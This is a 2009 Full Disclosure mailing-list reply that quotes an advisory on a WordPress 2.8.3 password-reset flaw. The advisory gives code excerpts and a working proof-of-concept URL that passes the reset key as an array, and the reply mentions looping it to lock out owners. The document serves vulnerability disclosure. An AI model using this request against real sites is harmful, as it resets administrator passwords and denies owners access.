Full Disclosure mailing list archives
Re: WordPress <= 2.8.3 Remote admin reset password
From: laurent gaffie <laurent.gaffie () gmail com>
Date: Mon, 10 Aug 2009 23:27:58 -0400
Well, i dont think so, that's why i published this. It very limitated. It's true, someone can make a loop script and avoid any possibility to log back on your wordpress blog, but you also can avoid that functionality easily, you just need to comment out 1 line. Anyways, a patch should come out soon. Regards Laurent Gaffié 2009/8/10 ehmo <diskusie () gmail com>
Very nice Laurent. That will hurt many ppl laurent wrote,============================================= - Release date: August 10th, 2009 - Discovered by: Laurent Gaffié - Severity: Medium =============================================I. VULNERABILITY ------------------------- WordPress <= 2.8.3 Remote admin reset passwordII. BACKGROUND ------------------------- WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability. WordPress is both free and priceless at the same time. More simply, WordPress is what you use when you want to work with your blogging software, not fight it.III. DESCRIPTION ------------------------- The way Wordpress handle a password reset looks like this: You submit your email adress or username via this form /wp-login.php?action=lostpassword ; Wordpress send you a reset confirmation like that via email:" Someone has asked to reset the password for the following site andusername.http://DOMAIN_NAME.TLD/wordpress Username: admin To reset your password visit the following address, otherwise just ignore this email and nothing will happenhttp://DOMAIN_NAME.TLD/wordpress/wp-login.php?action=rp&key=o7naCKN3OoeU2KJMMsag"You click on the link, and then Wordpress reset your admin password, and sends you over another email with your new credentials.Let's see how it works:wp-login.php: ...[snip].... line 186: function reset_password($key) { global $wpdb;$key = preg_replace('/[^a-z0-9]/i', '', $key);if ( empty( $key ) ) return new WP_Error('invalid_key', __('Invalid key'));$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->usersWHEREuser_activation_key = %s", $key)); if ( empty( $user ) ) return new WP_Error('invalid_key', __('Invalid key')); ...[snip].... line 276: $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login'; $errors = new WP_Error();if ( isset($_GET['key']) ) $action = 'resetpass';// validate action so as to default to the login screen if ( !in_array($action, array('logout', 'lostpassword','retrievepassword','resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) ) $action = 'login'; ...[snip]....line 370:break;case 'resetpass' : case 'rp' : $errors = reset_password($_GET['key']);if ( ! is_wp_error($errors) ) { wp_redirect('wp-login.php?checkemail=newpass'); exit(); }wp_redirect('wp-login.php?action=lostpassword&error=invalidkey'); exit();break; ...[snip ]...You can abuse the password reset function, and bypass the first step and then reset the admin password by submiting an array to the $key variable.IV. PROOF OF CONCEPT ------------------------- A web browser is sufficiant to reproduce this Proof of concept: http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=<http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key%5B%5D=> The password will be reset without any confirmation.V. BUSINESS IMPACT ------------------------- An attacker could exploit this vulnerability to compromise the adminaccountof any wordpress/wordpress-mu <= 2.8.3VI. SYSTEMS AFFECTED ------------------------- AllVII. SOLUTION ------------------------- No patch aviable for the moment.VIII. REFERENCES ------------------------- http://www.wordpress.orgIX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com I'd like to shoot some greetz to securityreason.com for them greatresearchon PHP, as for this under-estimated vulnerability discovered byMaksymilianArciemowicz : http://securityreason.com/achievement_securityalert/38X. REVISION HISTORY ------------------------- August 10th, 2009: Initial releaseXI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information._______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password Nicolas Valcárcel Scerpella (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Message not available
- Message not available
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password Jeremy Brown (Aug 10)
- Message not available
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Message not available
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password g30rg3_x (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password Nicolas Valcárcel Scerpella (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)
- Message not available
- Message not available
- Re: WordPress <= 2.8.3 Remote admin reset password laurent gaffie (Aug 10)